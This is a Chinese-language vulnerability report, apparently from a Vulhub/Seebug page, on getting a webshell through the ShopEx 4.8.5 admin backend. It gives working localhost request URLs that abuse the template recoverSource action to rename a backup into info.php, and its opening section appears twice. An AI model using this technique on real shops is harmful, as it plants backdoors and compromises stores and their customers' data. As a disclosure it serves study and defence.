VULHUB ™

### 简要描述： shopex485 最新后台拿webshell ### 详细说明： shopex485 最新后台拿webshell 测试版本：shopex485 日期：2014.8.25 ### 漏洞证明： 页面管理-模板列表-模板文件管理，选择任意页面修改 [<img src="https://images.seebug.org/upload/201408/252237507fd297b048a7c0cb55a9de74d9aa5f5b.jpg" alt="QQ图片1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/252237507fd297b048a7c0cb55a9de74d9aa5f5b.jpg) [<img src="https://images.seebug.org/upload/201408/252242496b30cbb47aeaf4c2f8501ed23d2a8690.jpg" alt="addda.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/252242496b30cbb47aeaf4c2f8501ed23d2a8690.jpg) 保存两次，复制info.bak_2.xml链接 ``` http://127.0.0.1/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_2.xml&p[1]=info.xml&p[2]=1354864820 ``` info.xml修改为info.php ``` http://127.0.0.1/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_2.xml&p[1]=info.php&p[2]=1354864820 ``` [<img...

### 简要描述： shopex485 最新后台拿webshell ### 详细说明： shopex485 最新后台拿webshell 测试版本：shopex485 日期：2014.8.25 ### 漏洞证明： 页面管理-模板列表-模板文件管理，选择任意页面修改 [<img src="https://images.seebug.org/upload/201408/252237507fd297b048a7c0cb55a9de74d9aa5f5b.jpg" alt="QQ图片1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/252237507fd297b048a7c0cb55a9de74d9aa5f5b.jpg) [<img src="https://images.seebug.org/upload/201408/252242496b30cbb47aeaf4c2f8501ed23d2a8690.jpg" alt="addda.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/252242496b30cbb47aeaf4c2f8501ed23d2a8690.jpg) 保存两次，复制info.bak_2.xml链接 ``` http://127.0.0.1/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_2.xml&p[1]=info.xml&p[2]=1354864820 ``` info.xml修改为info.php ``` http://127.0.0.1/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_2.xml&p[1]=info.php&p[2]=1354864820 ``` [<img src="https://images.seebug.org/upload/201408/25224605c5441b4ab2b718de74e54efc14df1289.jpg" alt="addddddddddddd.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/25224605c5441b4ab2b718de74e54efc14df1289.jpg) shell就躺在了模板文件夹下 [<img src="https://images.seebug.org/upload/201408/252247146c2341846370c5092d670f149081f7ff.jpg" alt="QQ图片20140825224437.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/252247146c2341846370c5092d670f149081f7ff.jpg)